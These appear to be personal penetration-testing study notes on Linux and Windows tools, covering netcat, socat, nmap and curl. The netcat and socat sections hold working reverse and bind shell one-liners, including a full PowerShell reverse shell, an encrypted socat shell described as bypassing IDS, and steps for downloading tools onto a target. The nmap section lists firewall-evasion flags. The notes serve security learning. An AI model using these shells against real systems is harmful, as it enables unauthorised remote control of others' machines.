= Operating Systems

== Linux

=== strings
Find string in binary file.

Useful to find binary without absolute path (if the initial binary has SUID bit set). We can create our own binary and update the PATH to have our own binary executed instead of the real ones.

=== strace
Trace system calls and signals of an executable. This can be useful to see files used that we could replace with our own.

=== sudo
|===
|Argument |Description

|-l
|List the allowed/forbidden commands for the invoking user

|===

=== fail2ban
Monitor attempted brute forces

=== cURL
Performs HTTP requests. No cookie handled automatically.

|===
|Argument |Description

|-X
|Specify HTTP methods: POST, PUT, ...

|--header
|

|--data
|body: --data 'my data'

|--cookie
|Set cookie: --cokie name=value

|===

=== dig
Manually query recursive DNS servers

[source,bash]
----
dig google.com @1.1.1.1
----

==== mkfifo
Create a named pipe

[source, bash]
----
mkfifo /tmp/f
----

=== netcat
Used to manually perform all kinds of network interactions but can also be used to receive reverse shells and connect to remote ports attached to bind shells on a target.

Start netcat listener
[source, bash]
----
nc -lvnp <port number>
----

* -l: tell netcat that this will be a listener
* -v: verbose
* -n: do not resolve hostname or use DNS
* -p: port number

*If using a port below 1024, we need sudo. The port cannot be used by another service, and the ports 80, 443, 53 will likely go past outbound firewall rules on the target.*

Connect to a listener
[source, bash]
----
nc <target ip> <port number>
----

==== Common Shell Payloads
Some versions of netcat have the `-e` option which allows us to execute a process on connection. Not available everywhere because considered insecure. Example with a listener

[source, bash]
----
nc -lvnp <port> -e /bin/bash
----

If not available, use
[source, bash]
----
(netcast listen syntax) mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

(netcat connect syntax) mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
----

The command first creates a named pipe at /tmp/f. It then starts a netcat listener, and connects the input of the listener to the output of the named pipe. The output of the netcat listener (i.e. the commands we send) then gets piped directly into sh, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe, thus completing the circle.

If windows server, we need a powershell reverse shell. Copy in cmd.exe shell
[source, bash]
----
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
----

Other reverse shell: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md[PayloadAllTheThings]

==== Shell stabilisation
With Python

[source, bash]
----
sudo nc -lvnp 443
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
----

If the shell dies, any input in our terminal will not be visible so press `reset`

With rlwrap
[source, bash]
----
rlwrap nc -lvnp <port>
----
Useful with Windows shells.

With socat, limited to Linux targets. Need to transfer https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true[socat static compiled binary] to the target by downloading it with wget.
[source, bash]
----
(attacker)sudo python3 -m http.server 80

Linux target: wget <LOCAL-IP>/socat -O /tmp/socat
Windows target: Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\\Windows\temp\socat.exe
----

Once we stabilised it, we configure the number of rows and columns.

[source, bash]
----
stty -a (check values of our own terminal and use them for the reverse/bind shell)
stty rows <number>
stty cols <number>
----

=== socat
Netcat on steroids. Usually more stable shell than netcat shells but the syntax is more difficult, and it is not installed by default. Socat is a connector between two points that could be virtually anything (port, keyboard, file, ...)

==== Reverse shell
[source, bash]
----
socat TCP-L:<port> - <=> nc -lvnp <port>
----

On windows
[source, bash]
----
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
----
The "pipes" option is used to force powershell (or cmd.exe) to use Unix style standard input and output.

On Linux
[source, bash]
----
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"
----

==== Bind shell
On Linux target, we would use for our listener

[source, bash]
----
socat TCP-L:<PORT> EXEC:"bash -li"
----

On Windows target, we would use for our listener
[source, bash]
----
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
----

Regardless of the target, we use this on our attacking machine
[source, bash]
----
socat TCP:<TARGET-IP>:<TARGET-PORT> -
----

==== Fully stable Linux tty reverse shell
Both machines must have socat installed (use socat static compiled binary).

[source, bash]
----
(attacker) socat TCP-L:<port> FILE:`tty`,raw,echo=0
(target) socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
----

* pty, allocates a pseudoterminal on the target -- part of the stabilisation process
* stderr, makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)
* sigint, passes any Ctrl + C commands through into the sub-process, allowing us to kill commands inside the shell
* setsid, creates the process in a new session
* sane, stabilises the terminal, attempting to "normalise" it.

==== Encrypted shell
Can be created in both bind and reverse shell -> bypass IDS.

First generate certificate on our attacking machine
[source, bash]
----
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
----

Set up reverse shell listener with verify=0 to not bother with the validation of the certificate.
[source, bash]
----
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
----

Connect back to our listener
[source, bash]
----
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash----
----

For bind shell:
[source, bash]
----
(attacker) socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -
(target) socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes
----

Certificate must be used on both side!

===== Example
[source, bash]
----
socat OPENSSL-LISTEN:53 FILE:tty,raw,echo=0,cert=encrypt.pem,verify=0

socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
----

=== nmap

Results can be opened (SYN/ACK), closed (RST) or filtered (if firewall rejects the request)

[source,bash]
----
iptables -I INPUT -p tcp --dport <port> -j REJECT --reject-with tcp-reset
----

|===
|Argument |Description

|-sT, -sS, -sU
|TCP scan, half open or stealth scans, UDP scans

|-sC
|--script=default script scan, --script=vuln

|-sV
|Probe open ports to determine service/version info

|-Pn
|Disable host discovery so no ping. Some hosts block ping (Windows by default).

|-p-
|Scan all ports.

|-oA
|Write output to file.

|===

==== Scan types
* TCP scans, 3 way handshake.
* Stealth scans are faster, but they require sudo permissions (need to create raw packets) and unstable services are sometimes brought down by SYN scans. Running nmap without sudo means having a default 3-way TCP handshake.
* UDP scans don't expect response. When port close, target should respond with an ICMP (ping) packet containing a message that the port is unreachable. If not, the port is considered opened/filtered.
* NULL (-sN): empty packet, target must respond RST if closed
* FIN (-sF): FIN flag packet, target must respond RST if closed
* Xmas (-sX): malformed packets (PSH, URG, FIN), expect RST response for closed ports

The goal is to evade firewall configured to drop incoming TCP packets to blocked ports which have the SYN flag set. Most modern IDS solutions are savvy to these scan types, so we can't rely on them 100% when dealing with modern systems.

Microsoft Windows and Cisco sometimes respond with RST for malformed packets.

ICMP network scanning (-sn): send ping requests to multiple IP addresses. Not always accurate but it provides a baseline.

[source,bash]
----
nmap -sn 192.168.0.1-254
nmap -sn 192.168.0.0/24
----

==== NSE Scripts
Nmap Scripting Engine, written in Lua.

* safe: won't affect the target
* intrusive: not safe, likely to affect the target
* vuln: scan for vulnerabilities
* exploit: attempt to exploit a vulnerability
* auth: attempt to bypass authentication for running services
* brute: attempt to bruteforce credentials for running services
* discovery: attempt to query running services for further info about the network (query SNMP server)

Examples:

* --script=vuln
* --script=http-fileupload-exploiter
* --script=smb-enum-users,smb-enum-shares

Can be combined with --script-args

https://nmap.org/nsedoc/[List of scripts] also available with nmap --script-help <script-name> or in /usr/share/nmap/scripts

Scripts can also be downloaded manually.

==== Firewall evasion

* -Pn: do not ping
* -f: fragment the packets to avoid detection (firewall, IDS)
* --mtu: maximum transmission unit size (multiple of 8)
* --scan-delay <time>ms: avoid any time-based firewall/IDS triggers which may be in place
* --badsum: generate invalid checksum for packets that will be dropped automatically by a firewall/IDS so we know there is one.

=== nslookup
Query Internet name servers interactively

|===
|Argument |Description

|--type
|CNAME, A, AAAA, .... Defaults are A then AAAA

|===

=== traceroute
* maps the path a request take as it heads to the target machine
* uses UDP by default but can be done by ICMP with a switch

=== whois
Query who a domain name is registered to. In Europe, personal details are redacted.

|===
|Tag |Function

|-U
|get userlist

|-M
|get machine list

|-N
|get namelist dump (different from -U and-M)

|-S
|get sharelist

|-P
|get password policy information

|-G
|get group and member list

|-a
|all of the above (full basic enumeration)
|===

== Windows

=== tracert
* maps the path a request take as it heads to the target machine
* uses ICMP by default but can be done by UDP with a switch

=== Run command

|===
|Command |Name |Description

|cmd
|Command Prompt
|run command

|compmgmt
|Computer Management
|System Tools, Storage, Services and Application

|control.exe
|Control Panel
|

|eventvwr.exe
|Event Viewer
|Audit of the system

|lusrmgr.msc
|Local User and Group Management
|

|msconfig
|System Configuration
|Troubleshooting, diagnose startup issues

|msinfo32.exe
|System Information
|Advanced info on hardware and software settings

|regedt32.exe
|Registry Editor
|

|resmon
|Resource Monitor
|htop

|taskmgr
|Task Manager
|

|UserAccountControlSettings.exe
|User Account Control
|

|winver.exe
|About Windows
|Windows version information

|===